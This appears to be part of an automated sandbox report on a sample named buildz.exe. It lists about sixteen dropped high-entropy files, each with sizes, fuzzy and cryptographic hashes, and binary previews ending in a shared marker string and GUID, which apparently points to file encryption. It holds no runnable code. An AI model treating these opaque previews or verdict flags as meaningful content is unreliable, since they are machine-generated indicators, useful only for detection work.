                        Preview:<?xml....K[...Z..i#.....]....r.!]..3....o..lL.O.]!.L4.......2.Y..Q.."...#......;..f4.6..,]P...qz.M.9+L......R.0.j....Y.....W..NO..r.../q(XXm$Q..p.o.B._.~N..1(9..$%.#......,...Z.g|...."........hTCJr.!.'n5.=...zC..i.U.....D.....=D..'...^..:4$/....T.g.:....._0..H.Xe.M...d.*..R....M.J...<.a..)..o...]....V..M.'C...OFH.%$......O0. W~....0N.R.w..........=V.Cp.K..n...>!8..S..~..!,`......VeHg....!....{$.......(lt......AL..4.*..,"...?...O. ._........^.k0DS%.....5...3*......M*.B.r..lqMU}/.C...W..[.R5.g..H=i...p........ .>.&.6....d.....-...6..~.k........l..&........5.e_......~..)&..+'.).....2@..)X.F>....._..C...F...D~w....4.}\..z.>..d...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):812
                        Entropy (8bit):7.726566734831448
                        Encrypted:false
                        SSDEEP:24:vryHD8vn9QSfHHAYBPhnTgtiHuhK0yNOGbD:vWj8vnCglhncgHt0yNOUD
                        MD5:365434469CE670A4A96F3B9E796D05E0
                        SHA1:85762173ABFF60DB1636E05FFDC26FF75AD3AB8C
                        SHA-256:42C7320BC4B8DF050D919B331A4869AA1D74889478B96FA70F6FB9D88B25F800
                        SHA-512:642E250811B43E375A22ACE6FA995A916CB6BBF9756BD0BC5C3AC0E94855F47B3F2F91F1AB93277799E543A025D7A2F5D8CE6B4F13E2A70B5E3520E93D7FAF6F
                        Malicious:false
                        Preview:<?xml.j.Z..l..........G.;...\..j.Bd..3.B.....1...]Ac.W`...d}'...~..|.%vn...e.JhU...0.....iC..nN.c..!;."...vpb....`...n...%.....U....V...+..E$..UUX....Bhw..y.....f`.]..)g{H.J..7..`!....e.......b...l.;..!....>ZC.y........O....\N..t.......U.X.;....z^..=....P...E.:.Q.L.j....(.6j.X..U......``....P..i....u](6......P...7c'..T..........O.k5.,".p.r..ecw..KR.~h..."A|.J7.`S._.!{GEoYB.Q...V....BY..2.:..9.P..R...|......"...;O.e..y.....wW.OlV.D. .L.3..>Q"...ea0f.c...j.3S.4T........d&...)H.....M.K....T~..*hr...0C...u.c\.W..QzgN..,.H.....0...&".h.A..8.)AE..66%........`.o.~>,....I!.q.{...Vj.\..O7@.(..|. .....40..`.?7..g-.........*.0....Z(..`.4. .....b...T....*K..._.).WX.."..I......bCu..k.}..B}.............x!:H.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):748
                        Entropy (8bit):7.6601263432304725
                        Encrypted:false
                        SSDEEP:12:jOEsyluiykw7Vw3Qz8eh8ILgL5HHeZ2UoIecTL9J1/26Gcii9a:jzsylz3wRGIsL5nIWIpn9JRGbD
                        MD5:03C820A0FE4C7054EC09D90E1DF6AEEF
                        SHA1:0666910D64EA8D3924ED0520A58BB0177D32B737
                        SHA-256:FEE42FB0480CEB76FB626A047749433AFD7D6A7BED4014349EB021E424FDD9AD
                        SHA-512:C0FBC0A569DA4394873EEA0EE16C2F5773017F85AB164AF02C4B1FEAC5DB7937000A65B0663A2CEA7CA509582641BC4BDC37B8B2483137397EC9A4852CED3B0C
                        Malicious:false
                        Preview:<?xml........1.k._{<<|.....%.v......4.y&*R|iG.M.K.._k.. 6{.H....@oZ>...].>.,..#.......E.o.d....B)....4AH....w../......M.R.HR.eTrA..p.....!.I....xRP.g.O@..31Y.eq....wx.+.@.......m.|.......N...3.G.~.1M.p...9.."..[....hJ...<."Aor....M\.1.*E.8.......u.).....9..<..6kL.Z...!XZ.....W.h....obc.!.Z^[.w.XZ...4|.\....s.p.%lyzv.m.H..L..}.a)Cxq9...TzK.....C..\.aS0.Le.F.A|.<M6R).. ..T.x..)..\...:*.8.;...#I..z.iO.l/.....[&.....F.....i...Mv.{.C..K.F...'......[4I.W{iv....@.....l..D...[..........-.o.F.!pt)B?.B.do!..dGc....Vo.t....w....H..g.-.<.{.{K...JOc.LM..x^.s...t~.3Xv...@P./.S+2T.........*f,!`.=....f......SZjH)<.OGn..........R.....<..%.....\....d.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):804
                        Entropy (8bit):7.6996223250782965
                        Encrypted:false
                        SSDEEP:12:Bp57n7bDc9njcpxBSyQG+1mPBRo8NDRg0HQojqtg6RSyRefu1Q1p54RbabS26Gcq:l7n7YkxnOsnb6k6td4yRwu1Q1D4RVGbD
                        MD5:3A00F706A39DF11B94CA50D7E3C90F07
                        SHA1:02C45C50A9220768E42BF0148C4C17788486C814
                        SHA-256:5162AF63CB7EE9A8645F1183F610E360B2BA41A39D5410D305601CFF8642CCA6
                        SHA-512:CEA92D6B53607A996540874FE63255A1A59EE3CDD10C09F52C4E945394A465B9148368843469A5EE9A87730C56062F5CC73045A26AE3E534F9F5DCBE920B01A2
                        Malicious:false
                        Preview:<?xmlN..i....KMR9..m/.o.....q*$l.W5...d;...Y=...R3._x.SF..m..:.1iz.~>.oJ."yR..Y9..^JX.4..!..Y..z.gyD..|..+..-%....3*.9g3.~...c.?g....5@l|...L......HSg,..c.......%...m< [.)[+...p.g.J..../..S.4...\..FjL......h.4...e.8... ..yzh..EL....T.-...L.....8.z..w....\.<....4...U.O......T...A-...d9...U....N...c.9lP....p.!.A../....g....2..}.119..9....Kl7u..;...goj<.9.S....W^.+l.,m..k..{....~v-...J}.....n. .......^..;F.9....@..}}..Q..S..k{....6.^....5..j....G..iS.P.hs[...>....._o..c.F.!..6..eV}M.....)&..%...#.xA....I.._iNe...H#...+.....(...@.i.7.7H|.]X?.u9...ri..K..w.f.r.1..4..lZI-r......l-. .$.f.0n..g.T.L.-...WP*)v8.2H...AV#Y...0..h.r8t".`......-....o.P.d.e..jt.........a.....OIP.<..i}...Vn...c1....%QEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.673250588808034
                        Encrypted:false
                        SSDEEP:12:sZdC+vhFaHdFYdvd+VCw2pHiDf74+Gjpd5EZJR+4GniAgRtF02Tw1cAHNztH26GX:a/y0KTGjpd5kJggtO2qzZGbD
                        MD5:2A1A5023769731EB8B7AFC8ABDFBF617
                        SHA1:D092A8A55092FB1803692B1FFC37EFAD7DCD81F8
                        SHA-256:EB14CFC0515242E2535960746F955BA89FFD523B6CFA923657D3267BC51147E0
                        SHA-512:D0143BD34D1D5AEBAF36D239B5DC7C6F5508274E13F487B2F9F508E4584E336B91FCCED331414310A4D7E3C7DBEC9824160D0DFE7C39F32F4276B50434DAE509
                        Malicious:false
                        Preview:<?xml.)..j...tS.'s...*..#.p......,(..%.j...r%.Q.u...k..'..((#.F...r`R@l.8........""."..4....k..t!A(.s.../.h...I.....p.7..x..S..r...Y...P...D..-q.Z...b..E--.N7.}.T.|..&.K.t*..c..........YN..\.c..FD..]..4T.-..:.....a..B:...W..g.).....&.....VQ..w....#..S.z....(.qA..Q.5<.]S.q.Xc;..7....=..S..j..j...&..a..#..q.....&....Z...j.:.d..|iZR.f-uU.*........D...Op}...0sp..h..R....4B..C...../..g.^.J.S...;.....$.0....S.*...9....N...<N.....<.n0..v@..s.....SE..h/.S%..D....h"hzC....+.-.....9).KMz.../@..^...f"...0..X.mM..o....Wh8-.<.D.fM..._J....[........<.....!./.2PR.{.F..9..._.=.....h..!.B,....J...#..]A.4....2....;.^._.+....Eu....."..u...yo'V.f.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):810
                        Entropy (8bit):7.69151683764153
                        Encrypted:false
                        SSDEEP:24:J1lg8UiR/KlE+O+LxWrmyHTAhgjPiFRAkjVGbD:tUitKevgxWNzmg+RASUD
                        MD5:F198A208F768B11D35677376727EE1CD
                        SHA1:A9545D6CE83036BA68FA06EEA6C993102D52E1CD
                        SHA-256:DF7025F31131CCEC36BBE39BC40E2E875478F44002B73E5AA36FA36DB0319898
                        SHA-512:A1A4A309946BE6939DFBEE4F6B3BFA033BB2B992CA606FDF506186E52AA0632F86AF7A5FEC70EB46B0A32CE73990C4E9B378517682EAC8150B812927BE498575
                        Malicious:false
                        Preview:<?xml.....a..oX(f....v4...].<.R...G&..]...C^...C.@J....dJ:/.J.4...o...T=....{P..........(.h(......vB..LB.. .D.a!..S...R....c.".jz...~...^..+../.x9..`....'S.?T..z$.D...."..R.!.(E..'S..~.!..lA*Z..>.c..Y...=...I..n...?fP...C....K.....!..|.K..7...l...>...../...c..O..........F.....R..D..c/m....H6.h.F9..i4O..r...|.TO.G...X3..<.&....&.YwCDu..C.Je.f..?..kJ>../.N.....~.........B..q$.Cx..{.$Pt....TH`d..w.?..U.b.O..........Th[S..........^.<...RCr....W..s.....B.Gd...m6...s5.....h)f..A..!..O.o.#..J4.$B.<.Ee2.;=......s..'G...X ...&?.\."-n&u2j.....DR...4*'... .........{EK.X....!..V.K@...&...].....Y1.[x...I...Pcq|.}.G..2.G..\....K..Hw..7.3YH<.<.....p/.yK=.)3o..K....A.-..`n.O.....~...S...K$/...-...F.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.679530552214693
                        Encrypted:false
                        SSDEEP:12:GAVPDzoT93OCVKsvgxw6yX2OvtzErilK7+egnuFlEY0UJDck7hVsYErfm0RbCNfK:GAVbzO93NVKlJOvtz8h+egnuFyY0UJHC
                        MD5:5AE1B6F1B39C86509EC15776E20C1B5E
                        SHA1:10CD59E6F07694AA11F62613B0010CC85868A300
                        SHA-256:04DE56773A949FD7ABE0758BE212754DCD21BD5DAADC90CE8D0A054C00957D84
                        SHA-512:2BC7D8A034340B6247F19754496A1E6A155E521BAA3E39422B43DF89668B4DB5C6F805C5475D11E9F2DC8942D26493A7526E1134C4AF2069AB2B6F0C2D56F266
                        Malicious:false
                        Preview:<?xml......3p...=?....\4..........j. a%.I5....k....6Z\...(..:...Nf..zv.].9..1..a...f....`V.x.p.@Vf.V........*....V.....;.N.....l.U.;NaE..=....GE.G.o.|..E1y.D...........^>.>..X.U.nZ$..w....hx.|..-.(3......y.....S.p.=+EQ...D.:d.....F.4..._....4....1O...,3J.3...8.7..#.?..g.=s.{.v.M".q......I-..&.......5."kG.zA...&..o.h.....\..fl........3/y.........tu.(`..E.!.......4.#+...2..n/.^.-.O}....F..(.Cm..0....*..R.....;.A>.tJ...v.....IX..[...C.Z.:.((.;...(5*-.vX.......%]..RE+eT.2B..j.5].....?..K..<.. 0....v....77..6.~....Lq.w.e..K.'.R;b..j5.....&6.O.....L]......[..............!.\x.f.CG^..=..3[.........>d.2..1.3..o...p.....E.6....v......kqb.!.x.U...VEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):810
                        Entropy (8bit):7.732601422059438
                        Encrypted:false
                        SSDEEP:12:5XcQ9hdIDlp9UpHOElo4nA7d3M1TIHLpil6boPONO/0P7R3/ItNh/DgUuAw7BS2b:qQ9hu2ZdAMTIHdsmQXh7FuARGbD
                        MD5:A4F7C3107024034C30608407D5C29F04
                        SHA1:525401401AF05A65FE6213933080E1239778FC59
                        SHA-256:65BF327BFA81CA2D7F707CB63B546A6DD13BAA7214EA34DB61F7AE5C961B9DCF
                        SHA-512:EE4890CDB12E3D67330045B3679EEEB428BFEB656B2849DC3AF1BADD90EC95FB2A13AA9219F5C101E51E6EB8D06282F9E106ECDD4B768ACD9F6827AE6E54B042
                        Malicious:false
                        Preview:<?xml.M0.be..{.....%... .W.[u..}......@..Pz..ErX.7.o.[.N.LJ.]z.....Fg.X..O.Yz.N.(~Dp....tq.....M.&!;#....\..+$....N.8....f..)....R....8I...aG`.j...{.......2.GN.....Z............,.....y..a......vN.."...v.. .k(T...IY....^r0.2.va..RG(....r..6.n.qO.....g.w0A...H...]...Z...P.NO..W...\....v.M.2.+.... `...3..Y.....*J.H.....Wu.^.=....wDK..l...i...t...E.~.=....1.N>..z..Z./...z].]..!.. .U...zc..1j.)......, hl.,E..:.?o..Z.?....-;..th...j....t..k&......"...E;.......J...^I]..5..^.d.b.......{7..6K.9#X.@..........gfl.....h].[1......<....9t....e....>elv.c..e........e..}j.iG".....;(...J...v06..6....+u..(...#.!n|.L..8)[.b+...}?'.)Y+....%.9....^.-Z)Gy..c)>W..6....y...|$.....Z.JAW..w......Th.Y*.V..{..P.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.67189188895776
                        Encrypted:false
                        SSDEEP:12:gvU8jYqldxro7SR41vW9w2gWXhEmsu8a2jRYL4eNGImKsgkPczjgua26Gcii9a:bUlz8261vvghEvRYL4FjgOuguoGbD
                        MD5:0429B95C54A9320F1EC073C20DA09EA1
                        SHA1:DD445FA07DD77CD2D9F1871746B6726E0923B2A8
                        SHA-256:2D0D732605B1E9AE0DD458FD036B8084608CB74054E07780D5FB64EBE5E0D5FE
                        SHA-512:3788E966A7C7FE431AE24664217513D4EE819FC1CA45D173494A98A3F8F19F57E6DECA95E07BEF782071ED22E649E294FF3A9CCF6172D2B10608A212716C9D8D
                        Malicious:false
                        Preview:<?xml...T...x.S2.^.....P-l...L..d........h...FK0B~.Vn..._.M.I.....%(..a...p..a[.....Y.74.E....=..K..X....u.hS.a..P..,..Kq\...4...-..r_.....).V. ....c.3d.;....7....$z;....8...L..<7.F.1.....<....h...c....4.y...eD..Er........l..s9wKC....E&^....?....z.VpUg.....P..9..5.M.m..r..`.....^.?..n.?...;....f.4.x%....(.H~...j....m.....H..4@.g. `....R...b....Q..J..cDi.l.}s.v.b...:.....^y. ...>...6...a..B...hy..z.2q[ .....@........p)=.r.......@..#k.Fs.....W..(}...6..Z......-.....g>6..2GN......".......j....).[Vn.UY..<l..v1.,P.I.........$X?.E.x.3#D.........;,...7.=....J.Z.....+/n...s..tn..o0D.<..H.-...hZ.0..7...[0.....N.j.;b...rV=.R.B!U..5..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):805
                        Entropy (8bit):7.729888315618153
                        Encrypted:false
                        SSDEEP:12:sV39Fa2HLJ8tHGtyc3jOZBbeQ7vySL5mKkjxbALyxA/wOlZcy3PfW8sAqYnN53II:mNFa2t8VBbeQDXMKkjxbCvcy5WGbD
                        MD5:2FEBC9E90362E47A6E227CBD380B40B5
                        SHA1:37AB6BD0EAE46EEA29ABD35106D6127DAD901AAA
                        SHA-256:99049A5192346E417BAF80AB80E98DF5D237D7FC72E9D178617473056DF9CF57
                        SHA-512:6135AE1F6495B9D91DEB0527F2EFBE2120D489CE10023B089123910AF758D7BD66101DAD6F4FC076266F34D5D36C6C8C136894844FF5BA8D6E1468C90D2D43F0
                        Malicious:false
                        Preview:<?xml.Fr..6... ....M.Y....@.X.~..!6/.\...Nh..0.....>.*Y./..[p..N#....;v\.W8],].=.`\.).s."a2'.....e2gz...Ki..9/I...L.:..q#,.O...l..k.....y2x.+..Q.}.]pL+]....`...F.R?)n.?...Z........."...T..2..H)..6.@......,..).Q.-..n..:~.....q..~..C..._.|.....m......io.d.....u.+d.D.*..|..=.p.........9...r......5..[.../...Ox...B....Vgh.:.....]`FKHB+..`.'H.#$.3G.!.r)...- o..bg..u8.35.4Z~......4!G....~.H.#..i.*......[..97v....mk..3.)~E..".<n....7:.=.U.Q..A%Q..weiW.)......U/Pm...TR.......zA.Y.TP.:Z..v.6....n..!...!.bN.o|z'.+.n...H.......Q.....f.Y[....$.wxm2u.Tq......M...T..0....W.2fFh...).E...M.eQ....k.|q.....`..P`..C.9|H..#.i...%......5\.Q.g...'......1X.&;lK.-t...U&.gX..a.d,....>.#;v.......]|.e.d..Dtt..,;d~..Jy.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):801
                        Entropy (8bit):7.717905107224637
                        Encrypted:false
                        SSDEEP:12:JSH7LB6esI9ElZxXgjxqvRn+Z/jLQ8DVdsPlSuMq4NG60JqSSK526Gcii9a:MZ6/iqvV+NjTDrsPgel60JqShGbD
                        MD5:D004FF1D023AA956BDAC5AD3B566DA39
                        SHA1:7D6BB62308525951932728284D07EE3125A6B9BE
                        SHA-256:044BAD07B9697A68B23080865DDFCEDBE13D945C845921BADD6291909043F5B3
                        SHA-512:BF0DEFE52E6DE164CCEF7C577FC2BB391F01DEB44D9A9AA7CE227E993E9F5CFF203E2C8A63D023DB30CF4DD750C9DA03EA9B1CDD347C4B6948D19F6656D14668
                        Malicious:false
                        Preview:<?xml..|<..c............n...C...e......' .V.6.R..b$u.Y.......s..z.........A#.2.\]D.,.WX.#\.R2.<z....|#4......6.....g;.NK.e.0...d_t<2..>. P..qS......#.P...i.C........)..N.*.w.}1....8.d...|...%..5..x......$.E..^.....J....2.7al.w...........[....<.5..+A.[.0......dI..h=....2.N....-.....k.`...l6..5...o....b1F.4..[.w.Q.)...../....c.A.....|...>x...T|t.4+ ..=k...o.Q..g....:4~!g..0.e..}4.&,.;....k$".U.k...q.e.............{.D..i......9.i-f2..!2Tdt.t.......z:N.k.....d).z...D..Xltb...N".NPW0@....<....4R.R.v.....#^...J.p......5f.w....N&@#..Wq.<..).}m[.si..#......8..#.<,.xXB.J.a.;4..]u|.........{..._W.?.>.~=......w...tB..#...N....g%....%z.Tr>.X%-...Is....i|....u..=}.....9.......\M.....3....f..X.s?...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):818
                        Entropy (8bit):7.714778481673554
                        Encrypted:false
                        SSDEEP:24:pV0nbR4vP9FymvpElhqF8BEavy+9gJGPoQ5HGcvw5EGbD:8bRUFym2l+kEIR9gJGANcvw5EUD
                        MD5:4FF9ECFE227DB6FF5BAAC1739D691848
                        SHA1:64D5683F84F9F5909CEE60BADA22CE6D352B0C6B
                        SHA-256:71D351522A9A77B00EF9B02C1E6FC426DBA33A9FC53CD909202FB5C0730226AE
                        SHA-512:802EFB7D2D659E80056003A78A2999CE1F61A152C6774BCDF045FB13D7E6C9802A6977CE9B73951B50C7F24979B193F4F0ACB922EB7740BE2AB20ED146384051
                        Malicious:false
                        Preview:<?xml...Y......%...mL...k..a...K.|yg.n8....(<.!SP9,....G.9.,..SG.0....01.QWD......EH..t.a)..H.pO\....C.H.b........VC........}..51.|!......o...Nf.....6...43.....U..V.X..Q....1..6..a.f....0..c.,...2r...Z.IeL.j.o._u9)..@..I.e...x.4...C.d.o\.K.~.q;..!.z.......8.`...m..v.>..TlQ..2....Ry$n<.,...3..5.)..Q....U.*..>AA_Q...~..V}.m...jzhP..n..vd....l*.....w..)B..ex'..K\0.'V......V.^D...a..{..D...+.#i.I.....l.d..i..z...8T.KU..|!.]sG.*...v&~..Dg. ......AX0.).jy<........H.........4.r.k.}8....+B.~.,...DAw:...sK.@F_I2T.....8....w..PQ..C....6.v.....l.3...0i..KCiV.....I..d....B...F....t......2..H*k.yOSa./&..mw.!2n...a..,qJ../.>..22..>j.z6.......2_..+b*.2d....oc.7..{*'...&y..7...&.<..O-*7s.z..n./...G ..,.'.FEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):744
                        Entropy (8bit):7.639406102295756
                        Encrypted:false
                        SSDEEP:12:KhVqbA8adgsAboeQ5YR+/3lQwP6rJ6h7v0ued/08Qt8nSzf1/26Gcii9a:ISA8O6b/Qf/3HCrJg7vVed8Hg8HGbD
                        MD5:BC27CE478D60BE0B7DF3D3DE522F5738
                        SHA1:A579D96A6A0441358D451FE74B08F33F485EA676
                        SHA-256:2082ED10D6DFC55E03A7924A4F2265AFDD138F1358C9E00C67D341AD02BF4AD6
                        SHA-512:92355DD02FE1A178B6F73D6145EBC5EBA59D95E80A3B97D4C8AA65961DA993A178354AA1E202DD9DB947D17279ED448E5475EE78075735B3BB83230947263CA1
                        Malicious:false
                        Preview:<?xml....&VH.)w.....j.....N...\.6.lt......7....T..}.9Ht....Y...I...3...x...|.(.F.M....o.{9....pC..O...<DI..-.~.t.U..5.VI...c.....+l..c.O..Ay.8....8.8uR....>..w.O8`'N...q-5..o..-.~.s........ r..*q...3.*...*..V.#s.......!..U.Kx...YF?`.5....r.N.............Yp.....T.+`.../....W.w..Cs.....G..'.G0W\q....p.UW......lx6.Y>il.E..U..$..h.@.gF....Hh...e.|....q*.9..C[.E....d... ..Y..<......U..a...\...5.4.r..+.VXv..M01.r...E...........I.i....)l..4;?.Q..L..}.vM..s...S)....k....q.'.ca....'B..PK^}.......U.T.....4?...o.......]......?.J...i.,.}B0.f-.&b..w..U2N{...'..E...G....sUd3._R...}i.m.\....g(.k.2.[..6.a(e.".8......|...Aa...xLu=.L....D..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):803
                        Entropy (8bit):7.703694865140985
                        Encrypted:false
                        SSDEEP:12:dRJixlqaZrC4iI9sI8Y3ocyRfRY9d1YKRrv3KctcqKXE920lCPVe1rd9r0GjwgpI:dctZr5excyR5YmKNvOJUUpPord+8GbD
                        MD5:8BE2C08756754E9E21DA279FF148FC99
                        SHA1:D1B14484346E9AC53498C5C421481BBDC06EB806
                        SHA-256:27FDB3C2970671156F090F7F0BACD5643DEE4CA90314B0986B69F902AA063844
                        SHA-512:223D4277DB6CB9508A06665AA602CB38D74E6BC2FDE425D2BFC227E5D2BE835B2B5B1A05CEEE5CE636A534742FC46810F5AAD2D56ED5755FC4DF930C1E719C21
                        Malicious:false
                        Preview:<?xml..t.2...L.M2....b3....EXg"....nj..9..b.._s..$uMz.v..:w.......%.?r....+*..l!|tY..C}..N.i..n..C.P+.l....|.&S...qn..'..M.4....m...6..xW..q..l$.-..T..T'&W...(..m.M......N.Jo.o.1.).A ...<....v..V.`.?....U..H...i`I..... ~.o.7.}.:^....k[...q...W..=C`.........v..G/.K.F.......i..f.tX..`.H4..;.rEev..I......\?t!.o;..{{ex.I....b.....W......z..sG......e.F.v..~..NV..l..b..`L.D..\.\v.,..Y.4..ceX.'...=..~...H....rwe..B.K...\....8..$.L.M.0.yo.u.\r`..s.w.=hI._~.?.G~')z....O..(......p..T....8...........L.6...{..!..Cog.=p....s..8...........,..T...c.hs.....E....p.."....x..M....!..g.J...@...z3.&....e.N..J7.....+.N.."A..@.X....~r.Hy~. ...&."..CG^.o......^.j+.t..>9..T....b.t.&......r.:..F.-e.#..'..z.`.N.;TEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):760
                        Entropy (8bit):7.76190614594955
                        Encrypted:false
                        SSDEEP:12:gN/P5lsAc6B85WxV65QnhYtdfPP5INl8F7KX5x4M90vOiw+Jevf9S+aN6jpckioI:gN37fbeW3hYDfPRIkhAp9DCilmipDhGX
                        MD5:4594298C5E3AA223EDFBD215AB3A72B2
                        SHA1:9856E11F6817A9A1EE400110BAE99309B251F1D6
                        SHA-256:EF6EABCBB56F193D39D0DD5A165AC059C3F01E360EEC0BB51BF53EC67BC9EF73
                        SHA-512:C86F051FA460E8AC413A36D8FE9A38501256E44DB26D596C70D982F90A023628D58D317111A10A53A1EB97703778123D2620868166DC08F18016D8F1A8135DAB
                        Malicious:false
                        Preview:<?xml].+~..y..cm.Q...Q.nU.t.0... #..,...A88n....M.u.a.wi......I...q..Mi...9.E..&....sO.._a.K.P..MsQ..._...en....r.(.....t.{..K...7......^... .........7+..._.j...DC.OK[qP...,.OA.G..t....Q.^[.......w.#...9.d...u...M...WB.:.......>l..b...H.H..k.....TS..c.L.H...7pG..`.`P.rC.....q.%..\..W.1....:(.6j.{5..Zr...&%x!.=#.........!..M*._...m.%B...2.S......Y[.).L..k..2..?....P.x.O.wC^Y6....IV..+.;.`.....]F>.......4........:t2.l..i.-..fu.[.Z...9...%.6.g3..H~. .YW.!...|N......_5.k..9m_..........(.=.J.<F."%........<3....>.b..pz:UE'._nV..z.C.do..$..."..D........Nz...'...#g=...!.@I....~.t:..S...fY+{F.}..a.#X..AV.hI]."C.....#t.....|.7..l.v.[.1......e......+..PEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):835
                        Entropy (8bit):7.749230060437494
                        Encrypted:false
                        SSDEEP:24:mxyUpQlAEtrJQSiTUZ1p3+0kwRdtdkMaNWfqj1HGbD:OyUgRFJQSioHZwNWuHUD
                        MD5:FEA3A2D33E97D4496E43217C77D8AFC9
                        SHA1:7A059D632EACA9A1D3DE01D605827D2A7D48CF38
                        SHA-256:2962640B0E6D6EC85F8F0197A143A537E3B97D02D95DD09F2BC06B1B800A1FEB
                        SHA-512:7E713EE6510D367CD77B139EF1CBA5C6A1A23165ECE0F905849092B2346EEA06C855C2C3E7C96381469C43F11A161E73BCF0359E665EA5322BE5FD6DB733A7D1
                        Malicious:false
                        Preview:<?xml......9.F.).....!)Z...BG.GCA.w.......s.=..S.Nis$..Gb.}....,..r....c..Z.U...v/..|.A.G....b.lmw.....QtA....V.z..4IvQ.^..O.?.,.X..... ..C..J..Q.5.....Q....9.,....... /..V..d.<=.a.d..M..H..^.9..d.a#85bI.%....2>....2.J....!..^\t.l.2.f..5.ML....?......w..2......~i.'y.2.hy../.W9..\.0....r.jI..w......P......9..."...Z%q|...p......Rf$...<.S..(....e:n.e.H..\.e<v..Y.v..4C@..8z.....d.|U...a....(.?]Q).$.&_.....A.......`'.0MBC.......[.......#).....R?j@W...I....z1|!.....o./...\.... ...-..a.B(..l...Y..{......q..RU-..py_....c.}..@..A....&.0}k..N... I...(...u.....2i1......;u7..j>..ag....e...[..{..&.....Q..^.......m.:..x.W..~.M....b...z?t...}..S.9=1?o....D^....4!.I8?..z!....I.=.iHHEv.d.Ms.......B..Rf...kL'..(....&..y.._.O.PSzAC .ZbEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):740
                        Entropy (8bit):7.68470528879131
                        Encrypted:false
                        SSDEEP:12:Dst6F6GRRNezCmJhoHGcZptq0T5H6nVt6N0nUxX0jn//5qHt/xLeKIK3GW/26Gcq:ZF7XNezCmQDD9anVQcUxkz//O/VkK2Wg
                        MD5:05F1ED27E92BABC767F34F0D36764C82
                        SHA1:24D59D1BB95B8595553BBF45AD2132ED2662892F
                        SHA-256:92C0062C3541157A682274B6147152992E171001E51D397E561F863035BCC174
                        SHA-512:2C89FB42F1C1AAADC197403DC3D750EEE7718956EF438FA6008AC021B857137793547EA28BE7C9AAFF233654A66BE6E63211304967185D99C087EC73195ECF76
                        Malicious:false
                        Preview:<?xml<|...z...$v_.5.h...0.zf$.P...)....c..=....:=...m.n..)D....X..*q.....);..S.U..4.VS...0.ijD..2....3b...!z.w.Z+._.?..,.....T....n.$l-l....m..`..9....h.w5.\^vr.....5~5^.[Dr.....o...h...-."}..h....b....$'dJ.*j..... P.\0..*...|...'*.8.#.O....1.....*.E..@.u.....1.(.......9.Y..%'!..@1."..n.O...1q..'.!4.9r..d.V..Aop....+.s&.F0....dv..G.:....Q.....;...fsDV7.......4..[...Y_..} 9k..H^.R.$..bu%..j.R....lJ):...h|\BZ...].7eW.#+.....6[....:l4.......?.=....d'w....A..|5...UO.+..6`O)..(}C.-...B......,......(.....i....U....y{...N.{.....f....5....t.&.\...(..3..ztNw.l ...c.m...D3..9...2 uU.O..5. z..C...,...!..gM.Q...R...........EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
